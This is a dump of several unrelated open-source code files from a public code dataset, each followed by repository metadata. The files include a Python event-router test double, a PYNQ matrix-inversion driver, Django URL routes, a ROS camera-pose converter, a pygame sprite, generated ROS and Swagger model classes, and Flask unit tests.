            append('../Check_Authors/keshav.csv', row_author[:2] + [row_review[3]] + row_author[2:])
        else:
            append('../Check_Authors/david.csv', row_author[:2] + [row_review[3]] + row_author[2:])
        cnt += 1
| [
"kganapathy23@gmail.com"
] | kganapathy23@gmail.com |
fd665f4ee1a672d4be5eb93dc6f5a52a578af62d | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/DummyRouter.py | aeb6ebe6d84716938a3c453ac113956c324b0805 | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: DummyRouter.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import logging
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.BaseHandler import *
# a dummy router to log data
class DummyRouter(object):
    """Test double for an event router: records every call instead of routing.

    Recorded calls are kept on _subs / _unsubs / _pubs so tests can assert on
    exactly what was subscribed, unsubscribed, and published.
    """

    def __init__( self ):
        self._log = logging.getLogger( "DummyRouter" )
        self._subs = []
        self._unsubs = []
        self._pubs = []

    def logMe(self):
        # Placeholder hook; only emits a debug line.
        self._log.debug( "logMe" )

    def subscribe(self, interval, handler, evtype=None, source=None):
        record = (interval, handler, evtype, source)
        self._subs.append(record)
        self._log.debug( "subscribe: %i, %s, %s, %s" % record )

    def unsubscribe(self, handler, evtype=None, source=None):
        record = (handler, evtype, source)
        self._unsubs.append(record)
        self._log.debug( "unsubscribe: %s, %s, %s" % record )

    def publish(self, source, event):
        record = (source, event)
        self._pubs.append(record)
        self._log.debug( "publish: %s, %s" % record )
| [
"github@lklyne.co.uk"
] | github@lklyne.co.uk |
8c692fd060f69162e03aad9ec2a23bd52730d207 | cb6dd50eca3d65c1ce34299cd71c4c5a17dbe186 | /pynq/invmat.py | 7ef75c05572db76b7466c61c8554a5d08715fef5 | [
"MIT"
] | permissive | kino2718/InverceMatrixIP | f54063d6cde3008a227364882ab8d5ad3d4d1930 | 0cf56d54ee663db69891a2f4835bde4d0e89bdd9 | refs/heads/master | 2021-01-01T17:45:24.303858 | 2017-10-10T04:08:08 | 2017-10-10T04:08:08 | 98,147,966 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | import axis_fifo as fifo
class InvMat:
    """Matrix inversion offloaded to hardware via an AXI-Stream FIFO.

    Values are streamed as signed 7Q8 fixed point (value * 256) and converted
    back to floats on the way out.
    """

    def __init__(self, size):
        # size: matrix dimension; matrices are handled as flat row-major lists.
        self.fifo = fifo.AXISFifo()
        self.matlen = size * size

    def inv(self, mat):
        """Invert *mat* (flat list of size*size values) and return the result.

        Raises ValueError/RuntimeError on bad input or FIFO errors. The
        original printed a message and then executed a bare ``raise`` outside
        any except block, which itself fails with "No active exception to
        re-raise" — proper exceptions replace that broken path.
        """
        if len(mat) != self.matlen:
            raise ValueError("mat size is invalid.")
        self.fifo.clear_int(0xffffffff)
        if self.fifo.int_status() != 0:
            raise RuntimeError("interrupt status register could not clear.")
        # Convert to 7Q8 fixed point and stream into the TX FIFO.
        mat7Q8 = [int(v * 256) for v in mat]
        for el in mat7Q8:
            if not self.fifo.get_tx_vacancy():
                raise RuntimeError("tx fifo is not vacancy.")
            self.fifo.write(el)
        self.fifo.start_tx(self.matlen)
        self.fifo.wait_tx_done()
        self.fifo.wait_rx_done(self.matlen)
        # Called for its side effect of readying the RX FIFO; the returned
        # byte count was unused in the original as well.
        self.fifo.ready_to_read()
        m_inv = []
        for _ in range(self.matlen):
            val = self.fifo.read()
            if val & 0x8000:
                # Sign-extend 16-bit two's-complement values.
                val -= 0x10000
            m_inv.append(val / 256)
        return m_inv
| [
"kino2718@gmail.com"
] | kino2718@gmail.com |
c2525abeea57432a93e0578742834f69db4c40a0 | 949e7e53f24d4800ad56e5659628606fd43744a3 | /src/fordisapp/urls.py | 6c313f50354b874cdf932d2780aa325c2dfb46a1 | [] | no_license | JuheePak/Web-project | 4839ed9ff70f1e47fe35097bb398e5924a3a1793 | 0b159a251dad76f246f3c6cd36da58961d7a82b0 | refs/heads/master | 2023-03-23T10:27:50.769648 | 2021-03-21T07:51:47 | 2021-03-21T07:51:47 | 290,143,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | from django.urls import path
from . import views
from django.conf.urls.static import static
from django.conf.urls import include, url
from django.conf import settings
urlpatterns = [
    # Core pages and authentication.
    path('', views.index, name="index"),
    path('register/', views.register, name="register"),
    path('login/', views.login, name="login"),
    path('logout/', views.logout, name="logout"),
    path('report/', views.report, name="report"),
    path('board/', views.board, name="board"),
    # Article detail / update, with and without a board-type slug.
    path('<int:pk>', views.detail, name='detail'),
    path('<slug:btype>/<int:pk>', views.detail, name='detail'),
    path('<int:pk>/update/', views.update, name='update'),
    path('<slug:btype>/<int:pk>/update/', views.update, name='update'),
    # Comment and nested-reply ("comment2") updates.
    path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/update/', views.comment_update, name='comment_update'),
    path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/update/<int:comment2_pk>/update/', views.comment2_update, name='comment2_update'),
    # Creation endpoints for articles, comments, and nested replies.
    path('create/', views.create, name='create'),
    path('<slug:btype>/create/', views.create, name='create'),
    path('<slug:btype>/<int:pk>/comments/create/', views.comment_create, name='comment_create'),
    path('<slug:btype>/<int:ppk>/<int:pk>/comments2/create/', views.comment2_create, name='comment2_create'),
    # Deletion endpoints.
    path('<slug:btype>/<int:pk>/delete/', views.delete, name='delete'),
    path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/delete/', views.comment_delete, name='comment_delete'),
    path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/delete/<int:comment2_pk>/delete/', views.comment2_delete,
        name='comment2_delete'),
    # Search by nickname or content.
    path("search1/<slug:btype>/<nickname>", views.search1, name="search1"),
    path("search2/<slug:btype>/<content>", views.search2, name="search2"),
    # AJAX-style validation / token endpoints.
    path("checknick/", views.checknick, name="checknick"),
    path("checkuseremail/", views.checkuseremail, name="checkuseremail"),
    path("getaccesstoken/", views.getaccesstoken, name="getaccesstoken"),
]
# Serve user-uploaded media directly only in development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT) | [
"juhee.pak.06@gmail.com"
] | juhee.pak.06@gmail.com |
8e5e6be6ac17bd00c8bfbf3ae6596487c2f1e6f0 | 81acc9e75d36e76b984972c1e1227258a9cc7bb7 | /src/tagslam/src/camera_poses_to_kalibr.py | 376ee474306a1cfe9fcb1181c7f4ac47e38bc543 | [] | no_license | roshea6/SeniorD-RMC-2019 | 64cc377abc994cf984e4fac387382132f56b5bfb | e2978e4782455317cf1d56bdcdcefc766f950050 | refs/heads/master | 2020-08-25T04:52:23.863408 | 2020-05-09T00:16:24 | 2020-05-09T00:16:24 | 216,963,683 | 1 | 0 | null | 2020-05-09T00:16:25 | 2019-10-23T03:53:03 | C++ | UTF-8 | Python | false | false | 1,546 | py | #!/usr/bin/env python
#------------------------------------------------------------------------------
# convert camera_poses.yaml to kalibr format
#
# 2019 Bernd Pfrommer
import rospy
import tf
import argparse
import yaml
import numpy as np
def read_yaml(filename):
    """Parse *filename* as YAML; return the parsed object, or None on error."""
    with open(filename, 'r') as y:
        try:
            # Security/deprecation fix: yaml.load without an explicit Loader
            # can construct arbitrary Python objects from the file and is
            # deprecated; safe_load only builds plain data, which is all a
            # camera_poses.yaml contains.
            return yaml.safe_load(y)
        except yaml.YAMLError as e:
            print(e)
def rvec_tvec_to_mat(rvec, tvec):
    # Build a 4x4 homogeneous transform from an axis-angle rotation vector
    # (angle = |rvec|, axis = rvec/|rvec|) and a translation vector tvec.
    l = np.linalg.norm(rvec)
    # Near-zero rotation: any axis works since the angle l is ~0, so the
    # rotation is numerically the identity; pick x to avoid dividing by ~0.
    n = rvec/l if l > 1e-8 else np.array([1.0, 0.0, 0.0])
    T = tf.transformations.rotation_matrix(l, n)
    T[0:3, 3] = tvec
    return T
def print_tf(T):
    # Print a 4x4 transform, one row per line, as YAML-style nested lists
    # (the format kalibr expects for T_cn_cnm1). Python 2 print statements.
    for i in range(0,4):
        x = T[i,:]
        print ' - [%15.12f, %15.12f, %15.12f, %15.12f]' % \
            (x[0], x[1], x[2], x[3])
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='convert camera_poses.yaml to kalibr transform')
    parser.add_argument(
        '--camera_poses', '-c', action='store', default=None, required=True,
        help='name of camera_poses.yaml file')
    args = parser.parse_args()
    y = read_yaml(args.camera_poses)
    # World-from-previous-camera transform; identity for the first camera.
    T_w_cnm1 = np.eye(4)
    for cam in sorted(y.keys()):
        p = y[cam]['pose']['position']
        pos = np.asarray([p['x'], p['y'], p['z']])
        r = y[cam]['pose']['rotation']
        rvec = np.asarray([r['x'], r['y'], r['z']])
        T_w_cn = rvec_tvec_to_mat(rvec, pos)
        print cam
        print ' T_cn_cnm1:'
        # Relative transform: previous camera frame expressed in this one.
        print_tf(np.matmul(np.linalg.inv(T_w_cn),T_w_cnm1))
        T_w_cnm1 = T_w_cn
| [
"rpo1202@gmail.com"
] | rpo1202@gmail.com |
4b2ba632b93f63633f331cad76afd74773270c42 | dd659fea91ad861cfbb8936f4d6f256d550001e4 | /server/web/utils/error.py | 2e0c511231ebc094541f0c1fe8780478ea58574f | [] | no_license | wubinhong/deployer | 883e6b2b9d460575a62ad32f5624bd45879617aa | 4988241a92be058b827107f2874fc98a41629327 | refs/heads/master | 2023-05-14T21:32:40.333334 | 2021-06-04T14:57:06 | 2021-06-04T14:57:06 | 373,876,496 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding:utf-8 -*-
__author__ = 'Binhong Wu'
class Error(Exception):
    """Application error carrying a numeric code and a human-readable message.

    When no explicit message is supplied, the message is looked up
    from MAPS using the error code.
    """

    # Default message for each known error code.
    MAPS = {
        10000: "income parameters error",
        10001: "project not exists.",
        10002: "host not exists.",
        10003: "user not exists.",
        10004: "deploy permission denied.",
        10005: "Incomplete parameter",
        # remote shell operations
        11000: "pre deploy shell called exception",
        11001: "post deploy shell called exception",
        11002: "restart shell called exception",
        11003: "rsync called exception",
        # local shell operations
        12000: "git repo clone exception",
        # user accounts
        13000: "username or password incorrect",
        13001: "user not exists",
        13002: "user exists",
        13003: "password not matched",
        # permission / login checks
        14000: "user not login",
    }

    def __init__(self, code, msg=None):
        """Store the code and either the explicit message or the MAPS default."""
        self.code = code
        self.msg = self.MAPS[code] if msg is None else msg

    def __repr__(self):
        return "{}: {}".format(self.code, self.msg)
| [
"wubinhong2012@gmail.com"
] | wubinhong2012@gmail.com |
eb9043e33499f259c6e2b6bb7325bd69fbbfaa33 | c760996cb71732a8396051c1032de9740b3a0c3f | /ship.py | d476053748e4de4aabd8e0383cf406d51504d75d | [] | no_license | L-eo/alien_invasion | f484263b101bd104a6c2cf64f5d7661e1d5fcd2d | 6a991a9340fa263d9d75bdefda045fdc329b9de1 | refs/heads/master | 2021-08-23T02:20:27.191720 | 2017-12-02T13:21:07 | 2017-12-02T13:21:07 | 112,843,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,874 | py | import pygame
from pygame.sprite import Sprite
class Ship(Sprite):
    """Player ship sprite: float-precision position moved by settings speed."""
    def __init__(self, ai_settings, screen):
        """Initialise the ship and set its starting position."""
        super().__init__()
        self.screen = screen
        # Load the ship image and get its bounding rectangle.
        self.image = pygame.image.load('images/ship.png')
        self.rect = self.image.get_rect()
        self.screen_rect = screen.get_rect()
        self.ai_settings = ai_settings
        # Start each new ship at the bottom centre of the screen.
        self.rect.centerx = self.screen_rect.centerx
        self.rect.bottom = self.screen_rect.bottom
        # Keep fractional positions in float attributes (rect stores ints only).
        self.center = float(self.rect.centerx)
        self.bottom = float(self.rect.bottom)
        # Movement flags, toggled by the keyboard event handlers.
        self.moving_right = False
        self.moving_left = False
        self.moving_up = False
        self.moving_down = False
    def update(self):
        """Adjust the ship's position according to the movement flags."""
        if self.moving_right and self.rect.right<self.screen_rect.right:
            self.center += self.ai_settings.ship_speed
        if self.moving_left and self.rect.left>0:
            self.center -= self.ai_settings.ship_speed
        if self.moving_up and self.rect.top>0:
            self.bottom -= self.ai_settings.ship_speed
        if self.moving_down and self.rect.bottom<self.screen_rect.bottom:
            self.bottom += self.ai_settings.ship_speed
        # Propagate the float position back into the rect used for drawing.
        self.rect.centerx = self.center
        self.rect.bottom = self.bottom
    def blitme(self):
        """Draw the ship at its current position."""
        self.screen.blit(self.image, self.rect)
    def center_ship(self):
        """Recentre the ship at the bottom middle of the screen."""
        self.center = self.screen_rect.centerx
        self.bottom = self.screen_rect.bottom
| [
"33517904+L-eo@users.noreply.github.com"
] | 33517904+L-eo@users.noreply.github.com |
39e20ac90186dc531aa10fe85562848f05598678 | 25f76378e8d451785efda3c12d8505d1e1f7f73f | /__init__.py | 1cc26b8ec1086e65c79e6e66aef26a02c63ea56c | [] | no_license | sikattin/python_sqlite3 | b030bbad955f34e4d09ddeb68f38b36aed389341 | ce6184ab2a3867f77a05d51fccc1d8465871966d | refs/heads/master | 2021-01-01T18:09:59.324372 | 2017-07-25T05:18:42 | 2017-07-25T05:18:42 | 98,265,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | """.
initialize sqlite3_db package.
"""
| [
"distortion0mix@gmail.com"
] | distortion0mix@gmail.com |
5c22c50092409f049081caf5752155a483abf51f | 6656c2acc607d269870d04d310e8a35ebbad8d3f | /lib/python2.7/dist-packages/pr2_mechanism_controllers/msg/_Odometer.py | 3a8c8d7ac9f8a3aacb42386f5ce327b54bf4e2bf | [] | no_license | uml-comp4510-5490/install | 97bd8b643773e34f3956e40ac169729a45e34bbe | 2897bf668177aced2e58cac18e86b109716c01df | refs/heads/master | 2020-04-01T05:59:56.541628 | 2018-10-14T01:52:57 | 2018-10-14T01:52:57 | 152,929,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,835 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from pr2_mechanism_controllers/Odometer.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class Odometer(genpy.Message):
_md5sum = "1f1d53743f4592ee455aa3eaf9019457"
_type = "pr2_mechanism_controllers/Odometer"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64 distance #total distance traveled (meters)
float64 angle #total angle traveled (radians)"""
__slots__ = ['distance','angle']
_slot_types = ['float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
distance,angle
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(Odometer, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.distance is None:
self.distance = 0.
if self.angle is None:
self.angle = 0.
else:
self.distance = 0.
self.angle = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2d = None
def _get_struct_2d():
global _struct_2d
if _struct_2d is None:
_struct_2d = struct.Struct("<2d")
return _struct_2d
| [
"james.perl12@gmail.com"
] | james.perl12@gmail.com |
7405b916f1b736e3577a6182f2df6a0a43bd5b87 | 36017343e096c0623e901a6f74108483c4d080b0 | /main.py | 461c48d3ad42842320b41ca6fc2f9821001e6340 | [] | no_license | carlosanghez/arcade | 00e420c4a6bb6d191810fb82db0afff66a3eb692 | 5630a906b8f5e271ab04154c97d1f89e96553cf0 | refs/heads/master | 2023-02-04T02:21:15.520403 | 2020-12-26T11:11:57 | 2020-12-26T11:11:57 | 323,635,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | print("hello")
mySprite = sprites.create(img("""
. . 2 2 b b b b b . . . . . . .
. 2 b 4 4 4 4 4 4 b . . . . . .
2 2 4 4 4 4 d d 4 4 b . . . . .
2 b 4 4 4 4 4 4 d 4 b . . . . .
2 b 4 4 4 4 4 4 4 d 4 b . . . .
2 b 4 4 4 4 4 4 4 4 4 b . . . .
2 b 4 4 4 4 4 4 4 4 4 e . . . .
2 2 b 4 4 4 4 4 4 4 b e . . . .
. 2 b b b 4 4 4 b b b e . . . .
. . e b b b b b b b e e . . . .
. . . e e b 4 4 b e e e b . . .
. . . . . e e e e e e b d b b .
. . . . . . . . . . . b 1 1 1 b
. . . . . . . . . . . c 1 d d b
. . . . . . . . . . . c 1 b c .
. . . . . . . . . . . . c c . .
"""),
SpriteKind.food) | [
"carlosanghez@gmail.com"
] | carlosanghez@gmail.com |
463634d045761a2bc6089838b2810c79f55472c6 | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/apply_config_body_manual_data.py | aa75dfca4effe3afe375954d8a1513babe352a82 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,229 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. 
A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyConfigBodyManualData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'manual_data_id': 'str',
'value': 'str'
}
attribute_map = {
'manual_data_id': 'manualDataId',
'value': 'value'
}
def __init__(self, manual_data_id=None, value=None): # noqa: E501
"""ApplyConfigBodyManualData - a model defined in Swagger""" # noqa: E501
self._manual_data_id = None
self._value = None
self.discriminator = None
if manual_data_id is not None:
self.manual_data_id = manual_data_id
if value is not None:
self.value = value
@property
def manual_data_id(self):
"""Gets the manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:return: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._manual_data_id
@manual_data_id.setter
def manual_data_id(self, manual_data_id):
"""Sets the manual_data_id of this ApplyConfigBodyManualData.
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:param manual_data_id: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._manual_data_id = manual_data_id
@property
def value(self):
"""Gets the value of this ApplyConfigBodyManualData. # noqa: E501
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:return: The value of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ApplyConfigBodyManualData.
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:param value: The value of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyConfigBodyManualData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyConfigBodyManualData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"jaceys.tan@gmail.com"
] | jaceys.tan@gmail.com |
d57ef9be514e2ce63c48d67c80336251d0f3da59 | 47d04c8ce72c247d306cdede90b09877407665c3 | /ask_trubnikov/question/migrations/0010_auto_20170501_0231.py | 1d93cd20165d472ac86282c0bdf482ec623be080 | [] | no_license | TrubnikovDmitriy/web-task-2 | 00cf7c98698ef3d47753968c3d086bf8820cba04 | 49a95df6828176023f955f9c8e2dd37aa90d257b | refs/heads/master | 2021-01-19T11:33:06.139051 | 2017-06-21T17:38:43 | 2017-06-21T17:38:43 | 87,977,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-01 02:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the unused 'seq' and 'seq1' fields from the Answer model."""
    # Must run after the previous auto-generated migration of this app.
    dependencies = [
        ('question', '0009_auto_20170501_0231'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='answer',
            name='seq',
        ),
        migrations.RemoveField(
            model_name='answer',
            name='seq1',
        ),
    ]
| [
"trubnikovdv@mail.ru"
] | trubnikovdv@mail.ru |
b7e7da09b42e464cfd960d7d71f876dc9de023f7 | 9f963f6a52c13eaabf0e53157636a9fb63b6f22f | /.venv/bin/django-admin | 757df18de10fe6021c495761ad7b492424d1212e | [] | no_license | sean-mcgimpsey/passwd | 278547104b2b8c5ce4646fbe549a807e642e8c43 | 0b142eaa663494d9cda8ae4714adbb44c9ef06a2 | refs/heads/master | 2022-11-30T13:52:22.841733 | 2020-08-17T21:21:07 | 2020-08-17T21:21:07 | 288,255,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | #!/home/sean/projects/password/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
| [
"sean.mcgimpsey@maruedr.com"
] | sean.mcgimpsey@maruedr.com | |
1b57a02ddad0c5b539cdf0671106d70c0eaaf546 | 7480095c156078bb8a70dfd365836eccb0ffdeb3 | /paarity_outliner.py | 563d0d50f33e79e2c3cc376362d4c3b1c55d66cf | [] | no_license | Ashish265/Kata | 78a58734afea9f0a2bf21b8ab2dd42380eb2dfa5 | ea64e083f4a55d3bafc2fbf3f0745f7c3cbdd46f | refs/heads/master | 2021-05-11T10:03:17.820018 | 2020-07-22T17:58:47 | 2020-07-22T17:58:47 | 118,091,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | def find_outlier(integers):
l=len(integers)
temp=""
count=0
if l<3:
return False
else :
for i in range(l):
if (integers[i]%2==0):
count=count+1
if (count>=2):
for i in range(l):
if (integers[i]%2==0):
continue
else:
print(integers[i])
else:
for i in range(l):
if (integers[i]%2==0):
print(integers[i])
else:
continue
find_outlier([2, 4, 6, 8, 10, 3])
find_outlier([2, 4, 0, 100, 4, 11, 2602, 36])
find_outlier([160, 3, 1719, 19, 11, 13, -21])
| [
"noreply@github.com"
] | Ashish265.noreply@github.com |
3be89ddf961eef7c4996cb5042ca247db7037bb1 | 001f70eb08670694976e182794cb842c1c1536a8 | /tests/test_unit.py | c10ce587dc54f6e3b642bd62ab75ce44a8111935 | [] | no_license | hitesh70738/Final_project_crud_app | 0c04623739b25b1b7527374f4faf8c3f7ba35975 | 6292c4673a63bc7862d9964ba4650004ce46dd6e | refs/heads/main | 2023-02-09T07:26:37.289238 | 2021-01-05T15:07:12 | 2021-01-05T15:07:12 | 323,407,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,965 | py | import unittest
from flask import url_for
from flask_testing import TestCase
from application import app, db
from application.models import Teams, Players
class TestBase(TestCase):
    """Common fixture: configures the app and seeds one team row per test."""
    def create_app(self):
        """Return the Flask app configured for testing.

        NOTE(review): this points at the on-disk sqlite file 'data.db';
        an in-memory database (sqlite:///:memory:) would isolate test runs
        from each other and from development data - confirm intent.
        """
        app.config.update(SQLALCHEMY_DATABASE_URI="sqlite:///data.db",
                SECRET_KEY='TEST_SECRET_KEY',
                DEBUG=True
                )
        return app
    def setUp(self):
        """Create all tables and insert a single known team row."""
        db.create_all()
        test_team = Teams(team_name="team name", sponsor="Emirates")
        db.session.add(test_team)
        db.session.commit()
    def tearDown(self):
        """Drop all tables so each test starts from a clean schema."""
        db.session.remove()
        db.drop_all()
class TestViews(TestBase):
    """Smoke-test that every route responds with HTTP 200."""
    def test_home_get(self):
        response = self.client.get(url_for("home"))
        self.assertEqual(response.status_code, 200)
    def test_create_get(self):
        response = self.client.get(url_for('create'))
        self.assertEqual(response.status_code, 200)
    def test_update_get(self):
        # Routes that take an id may redirect; follow to the final page.
        response = self.client.get(url_for('update', id=1), follow_redirects=True)
        self.assertEqual(response.status_code,200)
    def test_add_get(self):
        response = self.client.get(url_for('add', id=1), follow_redirects=True)
